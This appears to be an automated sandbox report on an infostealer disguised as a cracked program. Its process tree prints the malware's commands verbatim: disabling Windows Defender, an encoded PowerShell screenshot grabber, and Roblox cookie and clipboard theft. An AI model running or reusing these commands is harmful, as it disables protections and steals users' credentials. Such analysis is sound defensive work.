Analysis

  • max time kernel
    30s
  • max time network
    33s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-05-2024 12:57

General

  • Target

    sillyboost_cracked_v1/silly.exe

  • Size

    31.7MB

  • MD5

    edf5231904acc98d0aa6e8dac9e6f57b

  • SHA1

    ab01505afc25fd2286fcc52a52a12c510b298fa4

  • SHA256

    4400e10819840cbbe5238f4cb4560ec2c5fa6dbfca6124d6065aa8df42506472

  • SHA512

    b4e01b5e2756fae3f7872d909bcb1e26618c6713d5428af6c96d08613154f65e749840ee07c3d6ce42af974a2c6c87b2bcd90e494e2e61722a377982b7070291

  • SSDEEP

    786432:EYSoQBHU9SuW1HMqG5qkOIRFbRBYvHjwouTtRLzx:EYSoQBD/NMqpk9FdKfjQtNx

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sillyboost_cracked_v1\silly.exe
    "C:\Users\Admin\AppData\Local\Temp\sillyboost_cracked_v1\silly.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3604
    • C:\Users\Admin\AppData\Local\Temp\sillyboost_cracked_v1\silly.exe
      "C:\Users\Admin\AppData\Local\Temp\sillyboost_cracked_v1\silly.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3108
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sillyboost_cracked_v1\silly.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3504
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sillyboost_cracked_v1\silly.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4772
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4476
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1060
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:676
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:628
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4916
          • C:\Users\Admin\AppData\Local\Temp\bound.exe
            bound.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:3472
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "ver"
              6⤵
                PID:5020
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more Tools', 0, 'Crack Done <3 ', 48+16);close()""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2944
          • C:\Windows\system32\mshta.exe
            mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more Tools', 0, 'Crack Done <3 ', 48+16);close()"
            4⤵
              PID:3696
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3740
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:2468
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3172
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic csproduct get uuid
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:5012
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2340
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              4⤵
                PID:4728
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1908
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                4⤵
                  PID:3296
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3208
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  4⤵
                  • Detects videocard installed
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5052
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4468
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  4⤵
                  • Detects videocard installed
                  PID:1456
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‍  .scr'"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1080
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‍  .scr'
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1828
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2900
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:2836
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:5080
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:760
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                3⤵
                  PID:1996
                  • C:\Windows\System32\Wbem\WMIC.exe
                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    4⤵
                      PID:4424
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                    3⤵
                      PID:3668
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell Get-Clipboard
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4984
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      3⤵
                        PID:4400
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          4⤵
                          • Enumerates processes with tasklist
                          PID:3056
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:4804
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:1804
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "systeminfo"
                            3⤵
                              PID:4728
                              • C:\Windows\system32\systeminfo.exe
                                systeminfo
                                4⤵
                                • Gathers system information
                                PID:3624
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                              3⤵
                                PID:4172
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  4⤵
                                    PID:2340
                                  • C:\Windows\system32\reg.exe
                                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                    4⤵
                                      PID:2364
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                    3⤵
                                      PID:2076
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3948
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zfa0blad\zfa0blad.cmdline"
                                          5⤵
                                            PID:5020
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD55.tmp" "c:\Users\Admin\AppData\Local\Temp\zfa0blad\CSCC2E930601F6C43DEB748033E1AC872C.TMP"
                                              6⤵
                                                PID:1844
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:4352
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:4272
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                              3⤵
                                                PID:3524
                                                • C:\Windows\system32\attrib.exe
                                                  attrib -r C:\Windows\System32\drivers\etc\hosts
                                                  4⤵
                                                  • Drops file in Drivers directory
                                                  • Views/modifies file attributes
                                                  PID:4804
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:1916
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:1264
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                    3⤵
                                                      PID:4468
                                                      • C:\Windows\system32\attrib.exe
                                                        attrib +r C:\Windows\System32\drivers\etc\hosts
                                                        4⤵
                                                        • Drops file in Drivers directory
                                                        • Views/modifies file attributes
                                                        PID:5112
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:4996
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:2360
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                          3⤵
                                                            PID:1932
                                                            • C:\Windows\system32\tasklist.exe
                                                              tasklist /FO LIST
                                                              4⤵
                                                              • Enumerates processes with tasklist
                                                              PID:4220
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            3⤵
                                                              PID:1796
                                                              • C:\Windows\system32\tree.com
                                                                tree /A /F
                                                                4⤵
                                                                  PID:2600
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                3⤵
                                                                  PID:4620
                                                                  • C:\Windows\system32\tree.com
                                                                    tree /A /F
                                                                    4⤵
                                                                      PID:4272
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                    3⤵
                                                                      PID:2432
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                        4⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:2500
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                      3⤵
                                                                        PID:1448
                                                                        • C:\Windows\System32\Conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          4⤵
                                                                            PID:5112
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                            4⤵
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:2368
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "getmac"
                                                                          3⤵
                                                                            PID:2672
                                                                            • C:\Windows\system32\getmac.exe
                                                                              getmac
                                                                              4⤵
                                                                                PID:4716
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36042\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\aGvVW.zip" *"
